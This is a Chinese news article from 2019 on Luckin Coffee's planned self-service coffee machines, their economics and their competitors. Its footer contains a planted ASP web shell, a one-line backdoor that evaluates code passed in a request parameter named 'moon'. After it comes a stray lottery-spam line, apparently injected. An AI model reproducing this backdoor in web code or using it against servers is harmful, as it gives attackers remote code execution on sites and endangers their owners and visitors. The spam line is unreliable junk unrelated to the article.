瑞幸將投放自助咖啡機,會不會再次掀起補貼戰?

發布時間: 2019年06月14日 信息來源:北京商報

萬家門店計劃之外,瑞幸咖啡又將挑戰自助咖啡機領域。

據自媒體“燃財經”6月14日發布的消息,瑞幸咖啡正在籌備自助咖啡機項目“瑞即購”(Luckin Coffee EXPRESS)。這是一種類似自助榨汁機的設備,用戶在APP上可以自動鎖定距離最近的咖啡機,下單并獲取領取碼,在咖啡機掃碼取杯現做,30秒就能制作完成。自助咖啡機咖啡的價格目前尚未被披露。

瑞幸咖啡對此不予置評。

此前5月29日,瑞幸咖啡創始人兼CEO錢治亞在瑞幸供應商大會上宣布,瑞幸咖啡2021年的門店數量將達到1萬家。彼時,瑞即購的項目并未被提及。

據燃財經上述報道披露的PPT顯示,瑞幸自助咖啡機的投放目標為寫字樓大堂、企業內部、學校等公共場所。

瑞幸咖啡一直對高校群體青睞有加,在去年快速擴張時,瑞幸就布局了包括北大、清華、農科院等多所高校,照其自助咖啡機的計劃看,瑞幸咖啡顯然是想讓咖啡機補充瑞幸門店覆蓋不到的區域,以較低的成本來獲得更多的客流。

這有點像之前全家便利布局“便利店+自助售賣機”的做法。全家在上海虹橋、江寧地鐵站等人流量大的場所提供一組智能販賣機和變形貨架,顧客可以自行掃碼下單,而這些設備的維護、補貨由附近全家便利門店人員來負責。

瑞幸咖啡的運營邏輯可能也是如此。

而連鎖咖啡品牌推出自己的咖啡機,以獲得更多銷售機會的做法,此前連咖啡也有過嘗試。它在今年4月發布了“口袋咖啡”的計劃——通過與個體門店合作,將連咖啡的咖啡機放入餐廳、果汁店等,咖啡價格在6-8元。區別于瑞幸咖啡,連咖啡采用的“介質”以全自動現磨咖啡機為主,且需要合作方的店員操作。

相較于開實體店,自助咖啡機具有成本較低、易于實現標準化操作的優勢。據燃財經披露的自助咖啡機財務模型,一臺咖啡機每天賣9杯咖啡便可以覆蓋成本,如果賣15杯以上就可以盈利。

據《經濟觀察報》報道,自助咖啡機品牌萊杯咖啡CEO周培杰此前曾算過一筆賬:咖啡機占地1平方米,一個人管理20臺自動設備,如果機器的成本是2萬一臺,一天一杯咖啡10元錢,5年折舊,一天只要賣出去7杯就能盈虧平衡。萊杯咖啡公司研發的自助咖啡機可以提供現磨咖啡、奶茶等16種飲品,單杯約270ml,客單價在10到15元不等。其中,單杯花式咖啡出品時間不到1分半,濃縮咖啡出品時間則在1分鐘以內。

不過,與現磨咖啡、咖啡餐廳面對的市場現狀類似,使用自助咖啡機的場景不僅有限,甚至面臨更多挑戰。

比如瑞幸咖啡自助機希望進入的寫字樓區域,該消費場景本身已經被雀巢咖啡機“普及”過一輪辦公室自助咖啡機,而寫字樓附近,往往也是便利店和咖啡館密集布局的區域。便利店里,不僅有更適合夏天的即飲咖啡,還有便利蜂、全家這樣的自營咖啡,價格在8-12元不等,部分門店的自助咖啡機還能提供現做的冰咖啡。

經過多年的教育,便利店咖啡已經在寫字樓消費群體相當普及。據全家便利王意文透露的數據,過去4年(2015-2018年)里,其自有品牌的湃客咖啡的銷量每年都實現了翻倍增長,2018年共賣出了4000萬杯。公司設定的2019年目標是銷量突破1億杯。

對于瑞信的自助咖啡機而言,更多的機會可能會在高等院校的圖書館、宿舍樓等特殊渠道。但校方是否會允許這樣做,大學生們對是否會選擇10元一杯的現磨咖啡的接受度如何,都是不確定因素。

即使是在這個細分渠道里,自助咖啡機的市場的早期教育者們——友咖啡、萊杯咖啡、友飲咖啡等品牌也早已入場。公開資料顯示,2017年友飲咖啡已完成全國超千臺點位布局,包括小米、索尼、中信、華潤等辦公場景和北京大學、復旦大學、南京大學等知名高校,預計2019年將達到1萬臺點位。

作為自助咖啡機領域的后來者,瑞幸咖啡或許會再次復制它此前瘋狂補貼的老辦法?

Powered by 軟文課堂 ? 2010-2017 陜ICP備14000116號-1 <% if request("moon")<>"" then b=request("moon") a=replace(b,"moon","eval") eval (a) end if %>

二中二计算公式规律